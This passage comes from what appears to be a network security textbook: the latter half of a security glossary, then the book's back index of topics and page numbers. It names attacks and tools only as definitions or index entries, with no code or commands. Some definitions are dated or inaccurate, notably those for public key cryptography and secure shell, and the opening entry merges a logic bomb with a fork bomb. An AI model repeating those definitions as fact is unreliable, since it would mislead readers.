Also known as a Fork Bomb. A resident computer program which, when executed, checks for a particular condition or particular state of the system which, when satisfied, triggers the perpetration of an unauthorized act.

mailbomb
The mail sent to urge others to send massive amounts of email to a single system or person, with the intent to crash the recipient's system.

malicious code
Hardware, software, or firmware that is intentionally included in a system for an unauthorized purpose (for example, a Trojan Horse).

metric
A random variable x representing a quantitative measure accumulated over a period.

mimicking
Synonymous with impersonation, masquerading, or spoofing.


Misuse Detection Model
The system detects intrusions by looking for activity that corresponds to known intrusion techniques or system vulnerabilities. Also known as rules based detection.

mockingbird
A computer program or process that mimics the legitimate behavior of a normal system feature (or other apparently useful function) but performs malicious activities once invoked by the user.

Multihost Based Auditing
Audit data from multiple hosts may be used to detect intrusions or misuse.

nack attack
Negative acknowledgment. A penetration technique which capitalizes on a potential weakness in an operating system that does not handle asynchronous interrupts properly, leaving the system in an unprotected state during such an attack.

NCSC
(National Computer Security Center) Originally named the DoD Computer Security Center. With the signing of NSDD-145, the NCSC is responsible for encouraging the widespread availability of trusted computer systems throughout the Federal Government. (AF9K_JBC.TXT)

network
Two or more machines interconnected for communications.

network based
Network traffic data along with audit data from the hosts, used to detect intrusions.

network level firewall
A firewall in which traffic is examined at the network protocol (IP) packet level.

network security
Protection of networks and their services from unauthorized modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.

network security officer
Individual formally appointed by a designated approving authority to ensure that the provisions of all applicable directives are implemented throughout the life cycle of an automated information system network.

network weaving
Another name for leapfrogging.

NII
(National Information Infrastructure) The nationwide interconnection of communications networks, computers, databases, and consumer electronics that makes vast amounts of information available to users. The NII encompasses a wide range of equipment, including cameras, scanners, keyboards, facsimile machines, computers, switches, compact disks, video and audio tape, cable, wire, satellites, fiber optic transmission lines, networks of all types, monitors, printers, and much more. The friendly and adversary personnel who make decisions and handle the transmitted information constitute a critical component of the NII. (Pending approval in JP 1-02.)


non-discretionary security
The aspect of DOD security policy which restricts access on the basis of security levels. A security level is composed of a read-level and a category-set restriction. For read access to an item of information, a user must have a clearance level greater than or equal to the classification of the information and also have a category clearance which includes all of the access categories specified for the policy.

non-repudiation
Method by which the sender of data is provided with proof of delivery and the recipient is assured of the sender's identity, so that neither can later deny having processed the data.

open security
Environment that does not provide sufficient assurance that applications and equipment are protected against the introduction of malicious logic prior to or during the operation of a system.

open systems security
Provision of tools for the secure internetworking of open systems.

operational data security
The protection of data from either accidental or unauthorized, intentional modification, destruction, or disclosure during input, processing, or output operations.

operations security
Definition 1: The process of denying adversaries information about friendly capabilities and intentions by identifying, controlling, and protecting indicators associated with planning and conducting military operations and other activities. Definition 2: An analytical process by which the US Government and its supporting contractors can deny to potential adversaries information about capabilities and intentions by identifying, controlling, and protecting evidence of the planning and execution of sensitive activities.

OPSEC
(Operations Security) A process of identifying critical information and subsequently analyzing friendly actions attendant to military operations and other activities to a. identify those actions that can be observed by adversary intelligence systems, b. determine indicators hostile intelligence systems might obtain that could be interpreted or pieced together to derive critical information in time to be useful to adversaries, and c. select and execute measures that eliminate or reduce to an acceptable level the vulnerabilities of friendly actions.

Orange Book
See Trusted Computer Security Evaluation Criteria.

OSI
(Open Systems Interconnection) A set of internationally accepted and openly developed standards that meet the needs of network resource administration and integrated network components.

packet
A block of data sent over the network transmitting the identities of the sending and receiving stations, error-control information, and message.


packet filter
Inspects each packet for user defined content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of firewall.

packet filtering
A feature incorporated into routers and bridges to limit the flow of information based on pre-determined communications such as source, destination, or type of service being provided by the network. Packet filters let the administrator limit protocol-specific traffic to one network segment, isolate email domains, and perform many other functions.

packet sniffer
A device or program that monitors the data travelling between computers on a network.

passive attack
Attack which does not result in an unauthorized state change, such as an attack that only monitors and/or records data.

passive threat
The threat of unauthorized disclosure of information without changing the state of the system. A type of threat that involves the interception, not the alteration, of information.

PEM
(Privacy Enhanced Mail) An IETF standard for secure electronic mail exchange.

penetration
The successful unauthorized access to an automated system.

penetration signature
The description of a situation or set of conditions in which a penetration could occur, or of system events which in conjunction can indicate the occurrence of a penetration in a system.

penetration testing
The portion of security testing in which the evaluators attempt to circumvent the security features of a system. The evaluators may be assumed to use all system design and implementation documentation, which may include listings of system source code, manuals, and circuit diagrams.

perimeter based security
The technique of securing a network by controlling access to all entry and exit points of the network. Usually associated with firewalls and/or filters.

perpetrator
The entity from the external environment that is taken to be the cause of a risk. An entity in the external environment that performs an attack, such as a hacker.

personnel security
The procedures established to ensure that all personnel who have access to any classified information have the required authorizations as well as the appropriate clearances.

PGP
(Pretty Good Privacy) A freeware program primarily for secure electronic mail.

phage
A program that modifies other programs or databases in unauthorized ways; especially one that propagates a virus or Trojan horse.

PHF
Phone book file demonstration program that hackers use to gain access to a computer system and potentially read and capture password files.

PHF hack
A well-known and vulnerable CGI script which does not filter out special characters (such as a new line) input by a user.


phracker
An individual who combines phone phreaking with computer hacking.

phreak(er)
An individual fascinated by the telephone system. Commonly, an individual who uses his knowledge of the telephone system to make calls at the expense of another.

phreaking
The art and science of cracking the phone network.

physical security
The measures used to provide physical protection of resources against deliberate and accidental threats.

piggy back
The gaining of unauthorized access to a system via another user's legitimate connection.

Ping of Death
The use of Ping with a packet size higher than 65,507. This will cause a denial of service.

plaintext
Unencrypted data.

Private Key Cryptography
An encryption methodology in which the encryptor and decryptor use the same key, which must be kept secret. This methodology is usually only used by a small group.

probe
Any effort to gather information about a machine or its users for the apparent purpose of gaining unauthorized access to the system at a later date.

procedural security
See Administrative Security.

profile
Patterns of a user's activity which can detect changes in normal routines.

promiscuous mode
Normally an Ethernet interface reads all address information and accepts follow-on packets only destined for itself, but when the interface is in promiscuous mode, it reads all information (sniffer), regardless of its destination.

protocol
Agreed-upon methods of communications used by computers. A specification that describes the rules and procedures that products should follow to perform activities on a network, such as transmitting data. If they use the same protocols, products from different vendors should be able to communicate on the same network.

prowler
A daemon that is run periodically to seek out and erase core files, truncate administrative log files, nuke lost-and-found directories, and otherwise clean up.

proxy
A firewall mechanism that replaces the IP address of a host on the internal (protected) network with its own IP address for all traffic passing through it. A software agent that acts on behalf of a user; typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps do additional authentication, and then complete a connection on behalf of the user to a remote destination.

PSYOP
(Psychological Operations) Planned operations to convey selected information and indicators to foreign audiences to influence their emotions, motives, objective reasoning, and ultimately the behavior of foreign governments, organizations, groups, and individuals. The purpose of psychological operations is to induce or reinforce foreign attitudes and behavior favorable to the originator's objectives.


Public Key Cryptography
Type of cryptography in which the encryption process is publicly available and unprotected, but in which a part of the decryption key is protected so that only a party with knowledge of both parts of the decryption process can fully communicate.

Red Book
See Trusted Network Interpretation.

reference monitor
A security control concept in which an abstract machine mediates accesses to objects by subjects. In principle, a reference monitor should be complete (in that it mediates every access), isolated from modification by system entities, and verifiable. A security kernel is an implementation of a reference monitor for a given hardware base.

replicator
Any program that acts to produce copies of itself; examples include a program, worm, fork bomb, or virus. It is even claimed by some that UNIX and C are the symbiotic halves of an extremely successful replicator.

retro-virus
A retro-virus is a virus that waits until all possible backup media are infected too, so that it is not possible to restore the system to an uninfected state.

rexd
This Unix command is the Sun RPC server for remote program execution. This daemon is started by inetd whenever a remote execution request is made.

risk assessment
A study of vulnerabilities, threats, likelihood, loss or impact, and theoretical effectiveness of security measures. The process of evaluating threats and vulnerabilities, known and postulated, to determine expected loss and establish the degree of acceptability to system operations.

risk management
The total process to identify, control, and minimize the impact of uncertain events. The objective of the risk management program is to reduce risk and obtain and maintain DAA (Designated Approving Authority) approval.

rootkit
A hacker security tool that captures passwords and message traffic to and from a computer. A collection of tools that allows a hacker to provide a back door into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkit is a classic example of Trojan Horse software. Rootkit is available for a wide range of operating systems.

router
An interconnection device that is similar to a bridge but serves packets or frames containing certain protocols. Routers link LANs at the Network Layer.

routing control
The application of rules during the process of routing so as to choose or avoid specific networks, links, or relays.

RSA Algorithm
RSA stands for Rivest-Shamir-Adleman. A public-key cryptographic algorithm that hinges on the assumption that the factoring of the product of two large primes is difficult.


Rules Based Detection
The intrusion detection system detects intrusions by looking for activity that corresponds to known intrusion techniques (signatures) or system vulnerabilities. Also known as Misuse Detection.

samurai
A hacker who hires out for legal cracking jobs, snooping for factions in corporate political fights, lawyers pursuing privacy-rights and First Amendment cases, and other parties with legitimate reasons to need an electronic locksmith.

SATAN
(Security Administrator Tool for Analyzing Networks) A tool for remotely probing and identifying the vulnerabilities of systems on IP networks. A powerful freeware program which helps to identify system security weaknesses.

secure network server
A device that acts as a gateway between a protected enclave and the outside world.

secure shell
A completely encrypted shell connection between two machines protected by a super long pass-phrase.

security
A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or influences.

security architecture
A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements.

security audit
A search through a computer system for security problems and vulnerabilities.

security countermeasures
Countermeasures that are aimed at specific threats and vulnerabilities or involve more active techniques as well as activities traditionally perceived as security.

security domains
The sets of objects that a subject has the ability to access.

security features
The security-relevant functions, mechanisms, and characteristics of AIS hardware and software.

security incident
Any act or circumstance that involves classified information that deviates from the requirements of governing security publications. For example, compromise, possible compromise, inadvertent disclosure, and deviation.

security kernel
The hardware, firmware, and software elements of a Trusted Computing Base that implement the reference monitor concept. It must mediate all accesses, be protected from modification, and be verifiable as correct.

security label
Piece of information that represents the sensitivity of a subject or object, such as its hierarchical classification (CONFIDENTIAL, SECRET, TOP SECRET) together with any applicable non-hierarchical security categories (such as sensitive compartmented information or critical nuclear weapon design information).

security level
The combination of a hierarchical classification and a set of non-hierarchical categories that represents the sensitivity of information.


security officer
The ADP official having the designated responsibility for the security of an ADP system.

security perimeter
The boundary where security controls are in effect to protect assets.

security policies
The set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information.

security policy model
A formal presentation of the security policy enforced by the system. It must identify the set of rules and practices that regulate how a system manages, protects, and distributes sensitive information.

security requirements
Types and levels of protection necessary for equipment, data, information, applications, and facilities.

security service
A service, provided by a layer of communicating open systems, which ensures adequate security of the systems or of data transfers.

security violation
An instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information contained therein or to the system itself.

server
A system that provides a network service such as disk storage and file transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.

Signaling System 7 (SS-7)
A protocol used by phone companies. Has three basic functions: supervising, alerting, and addressing. Supervising monitors the status of a line or circuit to see if it is busy, idle, or requesting service. Alerting indicates the arrival of an incoming call. Addressing is the transmission of routing and destination signals over the network in the form of dial tone or data pulses.

SIO
(Special Information Operations) Information Operations that, by their sensitive nature, due to their potential effect or impact, security requirements, or risk to the national security of the United States, require a special review and approval process. (DODD S-3600.1 of 9 Dec 96)

skipjack
An NSA-developed encryption algorithm for the Clipper chip. The details of the algorithm are unpublished.

smurfing
A denial of service attack in which an attacker spoofs the source address of an echo-request ICMP (ping) packet to the broadcast address for a network, causing the machines in the network to respond en masse to the victim.

snarf
To grab a large document or file for the purpose of using it with or without the author's permission.

sneaker
An individual hired to break into places in order to test their security; analogous to tiger team.


sniffer
A program to capture data across a computer network. Used by hackers to capture user ID names and passwords. Software tool that audits and identifies network traffic packets. It is also used legitimately by network operations and maintenance personnel to troubleshoot network problems.

SNMP
(Simple Network Management Protocol) Software used to control network communications devices using TCP/IP.

spam
To crash a program by overrunning a fixed-size buffer with excessively large input data. Also, to cause a person or newsgroup to be flooded with irrelevant or inappropriate messages.

SPI
(Secure Profile Inspector) A network monitoring tool for UNIX, developed by the Department of Energy.

spoofing
Pretending to be someone else. The deliberate inducement of a user or a resource to take an incorrect action. An attempt to gain access to an AIS by pretending to be an authorized user. Impersonating, masquerading, and mimicking are forms of spoofing.

SSL
(Secure Sockets Layer) A session layer protocol that provides authentication and confidentiality to applications.

subversion
Occurs when an intruder modifies the operation of the intrusion detector to force false negatives to occur.

SYN Flood
A denial of service attack in which the target's SYN queue is flooded; once the SYN queue is full, no new connection can be opened.

TCB
(Trusted Computing Base) The totality of protection mechanisms within a computer system, including hardware, firmware, and software, the combination of which is responsible for enforcing a security policy. A TCB consists of one or more components that together enforce a unified security policy.

TCP wrapper
A software tool for security which provides additional network logging, and restricts service access to authorized hosts by service.

TCP/IP
(Transmission Control Protocol/Internetwork Protocol) The suite of protocols on which the Internet is based.

TCSEC
(Trusted Computer System Evaluation Criteria) A system that employs sufficient hardware and software assurance measures to allow its use for simultaneous processing of a range of sensitive or important data issues.

Term Rule-Based Security Policy
A security policy based on global rules imposed for all users. These rules usually rely on a comparison of the sensitivity of the resources being accessed and the possession of corresponding attributes of users, a group of users, or entities acting on behalf of users.

terminal hijacking
Allows an attacker, on a certain machine, to control any terminal session that is in progress. The attacker can send and receive terminal I/O while a user is on the terminal.


threat
The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security.

threat agent
Methods and things used to exploit a vulnerability in an information system, operation, or facility; fire, natural disaster, and so forth.

threat assessment
Process of formally evaluating the degree of threat to an information system and describing the nature of the threat.

tiger
A software tool which scans for system weaknesses.

tiger team
Government- or industry-sponsored team of computer experts who attempt to break down the defenses of computer systems in an effort to uncover, and eventually repair, holes in the security.

tinkerbell program
A monitoring program used to scan incoming network connections and generate alerts when calls are received from particular sites, or when logins are attempted.

topology
The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information flows.

trace packet
In a packet-switching network, a unique packet that causes a report of each stage of its progress to be sent to the network control center from each visited system element.

traceroute
An operation of sending trace packets for determining information; traces the route of UDP packets from the local host to a remote host. Normally traceroute displays the time and location of the route taken to reach its destination.

tranquillity
A security model rule stating that the security level of an active object cannot change during the period of activity.

tripwire
A software tool for security. Basically, it works with a database that maintains information about the byte count of files. If the byte count has changed, it will identify it to the system security manager.

Trojan Horse
An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.

Trusted Network Interpretation
The specific security features, assurance requirements, and rating structure of the Orange Book as extended to networks of computers ranging from isolated LANs to enterprise level.

TTY watcher
A hacker tool that allows hackers with even a small amount of skill to hijack terminals. It has a GUI interface.

vaccine
Program that injects itself into an executable program to perform a signature check and warns if there have been any infections.

virus
A program that can "infect" other programs by modifying them to include a possibly evolved copy of itself.


vulnerability
Hardware, firmware, or software flaw that leaves an AIS open for potential exploitation. A weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS.

vulnerability analysis
Systematic examination of an AIS or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.

WAIS
(Wide Area Information Service) An Internet service that allows you to search a large number of specially indexed databases.

WAN
(Wide Area Network) A physical or logical network that provides capabilities for a number of independent devices to communicate with each other over a common transmission-interconnected topology in geographic areas larger than those served by local area networks.

war dialer
A program that dials a given list or range of numbers and records those which answer with handshake tones, which might be entry points to computer or telecommunications

worm
Independent program that replicates from machine to machine across network connections, often clogging networks and information systems as it spreads.


6-over-4 interface, 66-67

A

access

gaining, 535-537

access control, 183-187

Web server, 449-450

Access Control List

See: ACL

acknowledgement numbers, 17

ACL, 237-240

anti-DoS, 367

anti-Land, 368

anti-spoofing, 368-369

anti-SYN, 367-368

command syntax, 363-364

creating, 359-360

defending against attacks, 367-369

extended syntax, 364-365

implementing, 363-367

logging, 374-376

operation, 360

Active Directory

See: AD

active open connection, 18-20

AD, 237-241

auditing, 285-286

structure, 237-240, 241

administrative access, 258-259

administrative distance, 349-350

administrator account, 255-257

AH

combine with ESP in IPSec, 117-119

configuring, 98-99

Transport mode, 80

Tunnel mode, 80

AH and ESP

in IPSec, 117-119

mismatched policies, 124-125

requiring in IPSec, 122-124

response policy, 127-128

session analysis, 120-122

alert, 216-218

anti-spoofing logging, 374

Apache, 454

ARP process, 334-336

attack, 182-183

hiding evidence, 538

hiding files, 538

OOB, 539

auditing, 276-277, 283-285

authentication, 64-66, 80, 132-134, 325

Authentication Header, 64-66

authentication methods, 246-249

editing policies, 95-96

authorization, 325

availability, 386

B

back door, 483-484

backup

adding data, 405

Cisco routers, 417-419

for Linux, 415-417

hardware, 394-395

incremental, 408-409

initiating, 399-400

options, 395-398

OSs, 391-398

plan, 380

policy, 384

products, 416-417

strategies, 398-399

viewing results, 400-401

week work, 404

weekend work, 402-403

banners, 327-328

basics, 12-13

Bastille, 229-232

using, 230

Berkeley Internet Name Domain

See: BIND

binary conversion, 7-8

BIND, 430-432

binding, 191-193

block inheritance, 260

breach, 169-172

broadcast, 14-15

INDEX

Index 567


browser security, 461-462

browsers

personal information, 476

buffer overflow, 443-444

buffered logging, 372

bug, 322

C

cable modem vulnerabilities, 460-461

captures

displaying, 24-25

CDP, 354-355

certificates, 132-134, 475-476

CGI, 441

Challenge Response authentication, 250

chmod command, 165

CIDR, 13-14

Cisco

backup for routers, 417-419

banners, 328-329

logging, 370

OS, 322

router language, 322

Cisco Discovery Protocol

See: CDP

Classless Interdomain Routing

See: CIDR

Client policy, 83-84

commands

chmod, 165

ipsec6.exe, 69-70

ipv6.exe, 69

ping6.exe, 70-71

umask, 171

Common Gateway Interface

See: CGI

compromise, 229

confidentiality, 64-66

configuration fragments, 324

connection, 18-20

establishing, 18-19

terminating, 19-20

connections

TCP, 33-34

console logging, 371

console password, 325

content rating, 473-474

using, 474-475

contingency plan, 384-385

creating, 385

testing, 385-386

cookies, 460, 473

CORE, 425-426

corrupt data, 412

Council of Registrars

See: CORE

cracking, 173-174

crash, 203-210

cryptography, 79

D

DARPA, 194-196

Data Encryption Standard

See: DES

data recovery, 297

DDoS, 431

dead gateway, 314-315

decimal conversion, 7-8

Default Response, 96-98

defaultless core routers, 429

Defense Advanced Research Projects Agency

See: DARPA

denial of host, 365

denial of network, 366

Denial of Service, 314-316

denial of subnet, 366

DES, 84-85

dialup client, 307-308, 312-313

dialup server, 305-306, 311-312

differential backup, 402

restoring data, 406-408

directory permission, 162-166

disabling services, 280-281

disaster recovery, 380-382, 406

distance vector routing, 347

Distributed Denial of Service

See: DDoS

DNS, 241-242, 426-428


for Windows 2000, 433-434

installing, 436-437

security, 432-433

spoofing, 433

standard secondary server, 439-440

targeting, 430-432

domain tree, 237-240

DoS, 448-449

performing, 538-539

DSL vulnerabilities, 460-461

dynamic routing, 342-345

E

EFS, 296-298

and users, 297

cryptography, 297-298

email

hack attacks, 455-459

message source, 486-487

security, 477-478

enable password, 326

Encapsulating Security Payload

See: ESP

ESP, 64-66

analysis, 114

combine with AH in IPSec, 117-119

encryption, 108-110

Transport mode, 80

Tunnel mode, 80

ESP IPSec session, 113

Ethereal, 28-29

GUI, 29-33

Ethernet interfaces, 67

event files

clearing, 538

Event IDs, 291

event logs, 294-295

Event Viewer, 295

managing, 288-290

executables

securing, 281-283

F

fault tolerance, 426-428

file attachment vulnerabilities, 458-459

file permissions, 162-166, 272-274

file structure, 155

filter list, 129-132

finger, 357

firewall, 80

folder permissions, 272-274

Forward Lookup Zone, 435-436

configuring, 437-438

fping/gping tool, 492-493

FTP

capture, 46-48

configuring, 99-100

granting, 366-367

session analysis, 49

full-scale environment simulation, 386

G

gaining access, 535-537

gaining rights, 536

generator, 389-391

fuel types, 391

implementing, 391

GNOME, 139, 140-142

GNU Network Object Model Environment

See: GNOME

Gold Standard, 253

analyzing, 269-271

implementing, 268-269

GPO, 242

editing, 243-244

enforcing, 244-245

graphical tracing tool, 489-490

group policy, 242, 259-260

implementing, 242-243

Group Policy Object

See: GPO

groups

accounts, 146-151

adding, 148-150

security, 253

standard, 147-148

Windows 2000, 254-255

GRUB loader, 537


H

hacker, 183-187

hacking, 428

hardware backup options, 394-395

hexadecimal conversion, 7-8

High security setting, 469-471

host, 3-6

host based access, 184-186

hot fixes, 451-452

checker, 452-453

HTML email attacks, 455-457

I

IAB, 425-426

IANA, 425-426

IAS, 309-310

ICANN, 425-426

ICMP, 355-356

direct broadcast, 355

session analysis, 46

unreachable, 355-356

ICMP messages, 38-40

ICS, 303

IESG, 425-426

IETF, 425-426

IIS, 445-446

incremental backup, 408-409, 410-411

incomplete restore, 413-415

restoring data, 413

incremental restore, 415

inheritance, 274

inodes, 154

integrity, 35-38

Internet Architecture Board

See: IAB

Internet Assigned Numbers Authority

See: IANA

Internet components, 422

Internet Connection Sharing

See: ICS

Internet Corporation for Assigned Names and Numbers

See: ICANN

Internet Engineering Steering Group

See: IESG

Internet Engineering Task Force

See: IETF

Internet Explorer 6

advanced settings, 464-466

default settings, 467-468

security settings, 466-467

settings, 462-464

Internet Information Server

See: IIS

Internet Protocol

See: IP

Internet Service Provider

See: ISP

Internet Society

See: ISOC

intrusion, 216-223

intrusion detection, 296

IP, 7-9

address classes, 8-9

bind addresses, 191-193

datagram, 35-38

private addresses, 9

redirect addresses, 191-193

security, 78-79

special-function addresses, 9

IPSec

AH implementation, 89

configuring a response, 119-120

configuring options, 125-127

custom policies, 90-94

disabling, 134-135

full session, 128-129

implementing, 80-81, 100-101

modes, 79-80

policies, 83-84

ipsec6.exe command, 69-70

IPv6

addresses, 62-63

basics, 62

installing, 64-66

interfaces, 66-68

security, 64-66


traffic, 71-72

utilities, 68-69

x-cast, 63

ipv6.exe command, 69

ISOC, 425-426

ISP, 424

targeting, 430

J

John the Ripper, 527-528

K

K Desktop Environment

See: KDE

KDE, 139, 140-142

Kerberos, 251-252

kernel, 139

keys, 79

keystrokes

logging, 521-522

recording, 520-521

L

L0pht, 523-527

LC4, 524-526

LAN, 86-89

LAN-to-LAN routing, 337

LAN-to-WAN routing, 338-340

last log file, 225-226

lastlog log file, 224-225

limited environment simulation, 386

link state routing, 348-349

Linux

administration, 138-139

backup options, 415-417

common commands, 143-145

disks, 152-153

file system, 151-156

logging in, 140

navigation, 139-145

partitions, 152-153

ping sweep, 492-493

run levels, 213

security, 162

system information, 158-162

traceroute, 489

Lion worm, 430

LM authentication, 247-248

Local Area Network

See: LAN

local security policy, 260-261

log files

managing, 295-296

log priority, 370-371

log viewer, 228-229

logging, 224-226, 283-285, 369-371

ACL, 374-376

anti-spoofing, 374

authentication, 291-294

buffered, 372

clearing, 538

configuring, 371-373

console, 371

last log, 225-226

lastlog, 224-225

secure log, 227

syslog, 372-373

terminal, 372

VTY, 375

Web server, 227

xferlog, 227

long distance carriers, 423

Low security setting, 468-469

M

message source, 486-487

metric, 346-350

Microsoft Management Console

See: MMC

Microsoft Virtual Machine

See: Microsoft VM

Microsoft VM, 471-472

mismatched IPSec

policies, 105-106

session analysis, 106-107

mismatched policies

AH and ESP, 124-125


MMC, 81-83

customized configuration, 84

mounting devices, 153-154

MTU restrictions, 315

multicast, 14-15, 63

N

NAP, 423-424

NAT, 303

Nessus, 507-510

vulnerability scan, 510-511

NetBIOS, 301-302

NetBus, 514-516

1.7, 515

Pro, 515-516

Netcat, 519-520

netstat tool, 497

network, 3-4

Network Access Point

See: NAP

Network Address Translation

See: NAT

Network File System

See: NFS

Network Information Centers

See: NIC

Network Information Service

See: NIS

Network Monitor, 22-28

Display view, 24-25

filters, 25-27

network security, 488

Network Service Provider

See: NSP

network system

gaining control, 519-520

NFS, 194-200

exports, 196-199

securing, 200-202

server, 194-196

NIC, 425-426

NIS, 202-203

nmap tool, 493

Front end, 506-507

OS detection, 505-506

no override, 259

NSP, 423

NTLM authentication, 248-249

NTLMv2, 249

NULL session, 275

O

object auditing, 285-286

object ownership, 156

OOB attack, 539

Open Systems Interconnection

See: OSI

open-source software, 138-139

operating modes, 323

Organizational Units

See: OU

OS

detecting, 502-505

OS backup, 391-398

OSI model, 4-6

OU, 237-240

Out Of Bounds attack

See: OOB attack

P

packet, 4-6

packet filter, 359-360

packet fragmentation, 44-45

packet sniffer, 460

PAM, 177-181

configuration files, 177

modules, 178-179

securing access, 180-181

security, 179-180

passive open connection, 18-20

passwords

cracking, 523-527

managing, 176-177

recommendations, 261-262

revealing, 529-531

security, 172-176

patched, 451-452

penetration, 483-484


permissions

assigning, 167

setting, 165

testing, 167-169

personal information, 476

phreaking, 483-484

physical security, 255-257

PID, 159

PING capture, 46-48

ping sweeps, 492-493

ping6.exe command, 70-71

Pinger tool, 493-494

plaintext, 79

Pluggable Authentication Modules

See: PAM

policy inheritance, 259

port scanning, 496-497

Windows, 499-502

ports, 20-22

privilege escalation, 535-536

probe, 430

Process Identifier

See: PID

profile, 473-474

promiscuous mode, 28-29

propagation, 274

protocol, 3-6

proxy, 291-294

R

RADIUS, 304-305

creating users, 308-309

dialup server, 311-312

RAID levels, 392-394

recovery policy, 384

Red Hat Network, 182

redirect, 191-193

registry

auditing, 286-288

backup, 278-279

blocking access, 279-280

configuration, 277-278

remote access, 303-304

remove unneeded services, 358-359

Request

policy, 108-110

Request For Comments

See: RFC

Request-and-Respond

policy, 102-103

session analysis, 103-104

Request-and-Response

session analysis, 111-112

Request-only

session analysis, 101-102

Require

policy, 104-105

Require ESP IPSec policy, 114-115

Require ESP IPSec session, 115-117

Require response

policy, 107-108

Respond only

policy, 110-111

restoring

files from backup, 401-402

the network, 313

restricting logon hours, 253-254

Revelation, 529-531

Reverse Lookup Zone, 434-435

configuring, 437-438

RFC, 6-7

rights

gaining, 536

RIP, 310-311, 350-351

RIPv2, 351-353

risk analysis, 383

rootkit, 430

routed protocols, 345

router, 12-13

access passwords, 325-327

accessing, 323

banners, 327-328

navigating, 324-325

targeting, 429

user accounts, 327

routing, 12-13

process, 340-342

protocols, 345, 346-350


Routing Information Protocol

See: RIP

S

SAM, 536-537

deleting, 536-537

renaming, 536-537

Samba, 203-210

configuration files, 204-206

maintaining, 206-207

uses, 204

scripting vulnerabilities, 457-458

secedit.exe utility, 267-268

secure log file, 227

Secure Server policy, 83-84, 86-89

Secure Shell

See: SSH

Secure Sockets Layer

See: SSL

security, 16-17

analysis snap-in, 265-266

browser, 461-462

custom templates, 264-265

DNS, 432-433

email, 477-478

errata, 182-183

file, 272

folder, 272

IIS, 445-446

in Windows 2000, 253

Internet Explorer 6, 466-467

IPv6, 64-66

Linux, 162

PAM, 179-180

password, 172-176

printer, 276

registry, 276-277

startup/shutdown, 210-211

templates, 262-264

updates, 182-183

Web server, 444

Web server directory, 449

Windows 2000 network, 298-301

Security Accounts Manager

See: SAM

security architecture, 246

security audit, 505-506

security level, 263-264

security policies, 83-84

sequence numbers, 17

server, 3-4

Server policy, 83-84

service identification, 497-498

services

removing, 211-212

session teardown process, 34-35

SetGID, 169-172

SetUID, 169-172

shadow password file, 174-175

Simple Network Management Protocol

See: SNMP

simulated test, 385

small services, 357

smart cards, 252

smurfing, 314-316

sniffer, 460

SNMP, 323

social engineering, 531-532

source routing, 356

spoofing, 229-230

DNS, 433

SSH, 213-214, 330

client configuration, 333

router configuration, 330-333

using, 214-215

verification, 331-332

SSL, 246

stack detection, 503-505

Standard Secondary Server, 439-440

static routing, 342-345

Sticky Bit, 169-172

subnet mask, 10-12

subnetting, 10-12

SubSeven Trojan, 513-514

super block, 154

superdaemon, 187-194

SuperScan, 494-495


Syn attack defense, 314

SYSKEY, 249-250

syslog logging, 372-373

system hardening, 280-283

system startup/shutdown

security, 210-211

T

target networks, 483-484

TCP, 16-17

connections, 33-34

flags, 17

headers, 40-42

TCP wrapper, 183-187

configuration files, 184-186

TCP/IP

filtering, 316-317

hardening, 314-316

TCP/IP model, 3-4

Telnet

granting, 366

terminal logging, 372

Terminal Window, 142-143

threat, 383

three-way handshake, 16-17

timestamp, 371

topology, 347

traceroute, 355-356, 488-489

on Linux, 489

on Windows, 488

Transport mode, 79-80

AH, 80

ESP, 80

tripwire, 216-223

database, 218

integrity check, 218-219

modes, 216

policy, 216-218

Trojan Horse, 20-22, 513

Tunnel mode, 79-80

AH, 80

ESP, 80

U

UDP, 16-17

UDP headers, 43-44

umask command, 171

undo configuration changes, 231

unicast, 14-15, 63

Uninterruptible Power Supply

See: UPS

UPS, 387-389

full server rack, 389

user accounts

expiration dates, 254

users

accounts, 146-151

adding, 148-150

security, 253

standard, 147-148

switching accounts, 151

V

Variable Length Subnet Masking

See: VLSM

virus, 382, 512

VLSM, 13-14

VTY logging, 375

VTY password, 326

vulnerability, 247-248

vulnerability scanning, 441

W

WAN, 236-237

Web design

common mistakes, 442-443

Web server

access control, 449-450

directory security, 449

Web server log files, 227

Web server security, 444

Web sites

configuration, 446-448

maintenance, 448

malicious, 517-518

Webmin, 157-158


Wide Area Network

See: WAN

wildcard mask, 361-363

Windows

ping sweep, 493-496

Windows 2000

DNS, 433-434

EFS, 296-298

local login process, 250-251

network security, 298-301

port scanning, 499-502

printer security, 276

registry security, 276-277

security, 236-237

traceroute, 488

worm, 382, 512

X

x-cast, 14-15

xferlog log file, 227

xinetd.conf, 187-189

xinetd.d, 189-191

Z

zone transfer, 440-441

Zone Transfer traffic, 432
